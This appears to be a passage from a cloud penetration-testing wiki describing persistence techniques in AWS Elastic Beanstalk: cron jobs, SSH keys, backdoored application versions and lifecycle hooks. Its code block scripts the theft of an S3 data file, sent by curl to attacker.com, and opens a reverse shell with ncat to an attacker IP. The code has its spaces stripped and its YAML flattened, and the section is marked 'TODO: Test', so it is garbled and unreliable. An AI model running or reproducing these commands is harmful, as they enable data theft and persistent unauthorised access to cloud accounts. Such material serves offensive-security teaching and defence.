In order to maintain persistence inside the AWS account, some persistence mechanism could be introduced inside the instance (cron job, ssh key...) so the attacker will be able to access it and steal IAM role credentials from the metadata service.
Backdoor in Version
An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
New backdoored version
Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
Abusing Custom Resource Lifecycle Hooks
TODO: Test
Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.
bashCopycode#Attackercreatesascriptthatexfiltratesdataandmaintainsaccessecho'#!/bin/bashaws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csvgzip /tmp/data.csvcurl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfilncat -e /bin/bash --ssl attacker-ip 12345'>stealthy_lifecycle_hook.sh# Attacker uploads the script to an S3 bucketawss3cpstealthy_lifecycle_hook.shs3://attacker-bucket/stealthy_lifecycle_hook.sh# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hookecho'Resources: AWSEBAutoScalingGroup: Metadata: AWS::ElasticBeanstalk::Ext: TriggerConfiguration: triggers: - name: stealthy-lifecycle-hook events: - "autoscaling:EC2_INSTANCE_LAUNCH" - "autoscaling:EC2_INSTANCE_TERMINATE" target: ref: "AWS::ElasticBeanstalk::Environment" arn: Fn::GetAtt: - "AWS::ElasticBeanstalk::Environment" - "Arn" stealthyLifecycleHook: Type: AWS::AutoScaling::LifecycleHook Properties: AutoScalingGroupName: Ref: AWSEBAutoScalingGroup LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING NotificationTargetARN: Ref: stealthy-lifecycle-hook RoleARN: Fn::GetAtt: - AWSEBAutoScalingGroup - Arn'>stealthy_lifecycle_hook.yaml# Attacker applies the new environment configurationaws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"